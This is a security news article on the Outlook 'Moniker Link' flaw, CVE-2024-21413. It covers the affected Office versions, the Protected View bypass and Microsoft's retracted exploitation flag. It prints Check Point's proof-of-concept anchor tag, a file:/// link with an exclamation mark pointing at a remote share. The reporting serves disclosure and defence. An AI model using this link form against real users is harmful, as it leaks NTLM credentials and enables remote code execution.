Update February 14, 16:50 EST: Article and title revised after Microsoft retracted the "active exploitation" update added to the CVE-2024-21413 advisory.
Microsoft says remote unauthenticated attackers can trivially exploit a critical Outlook security vulnerability that also lets them bypass the Office Protected View.
Discovered by Check Point vulnerability researcher Haifei Li and tracked as CVE-2024-21413, this bug leads to remote code execution (RCE) when opening emails with malicious links using a vulnerable Microsoft Outlook version.
This happens because the flaw also enables attackers to bypass the Protected View (designed to block harmful content embedded in Office files by opening them in read-only mode) and open malicious Office files in editing mode.
Redmond also warned that the Preview Pane is an attack vector for this security flaw, allowing successful exploitation even when previewing maliciously crafted Office documents.
Unauthenticated attackers can exploit CVE-2024-21413 remotely in low-complexity attacks that don't require user interaction.
"An attacker who successfully exploited this vulnerability could gain high privileges, which include read, write, and delete functionality," Microsoft explains.
"An attacker could craft a malicious link that bypasses the Protected View Protocol, which leads to the leaking of local NTLM credential information and remote code execution (RCE)."
CVE-2024-21413 affects multiple Office products, including Microsoft Office LTSC 2021 and Microsoft 365 Apps for Enterprise, as well as Microsoft Outlook 2016 and Microsoft Office 2019 (under extended support).
Exclamation mark to bypass Outlook protections
As explained by Check Point in a report published today, the vulnerability they dubbed Moniker Link allows attackers to bypass built-in Outlook protections for malicious links embedded in emails using the file:// protocol and adding an exclamation mark to URLs pointing to attacker-controlled servers.
The exclamation mark is added right after the document extension, together with some random text (in their example, Check Point used "something"), as shown below:
*<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>*
This type of hyperlink bypasses Outlook security restriction, and Outlook will access the "\\10.10.111.111\test\test.rtf" remote resource when the link is clicked without throwing any warnings or errors.
The flaw was introduced because of the MkParseDisplayName unsafe API, so the vulnerability may also impact other software that uses it.
The impact of attacks successfully exploiting CVE-2024-21413 includes theft of NTLM credential information, arbitrary code execution via maliciously crafted Office documents,
"We've confirmed this #MonikerLink bug/attack vector on the latest Windows 10/11 + Microsoft 365 (Office 2021) environments," Check Point said.
"Other Office editions/versions are likely affected, too. In fact, we believe this is an overlooked issue which existed in the Windows/COM ecosystem for decades, since it lies in the core of the COM APIs. We strongly recommend all Outlook users apply the official patch as soon as possible."
Microsoft updated the CVE-2024-21413 security advisory today to warn that this Outlook bug was also being exploited in attacks as a zero-day before this month's Patch Tuesday.
However, the company reverted the change saying that it "mistakenly updated exploited flag and exploitability assessment to indicate exploitation existed."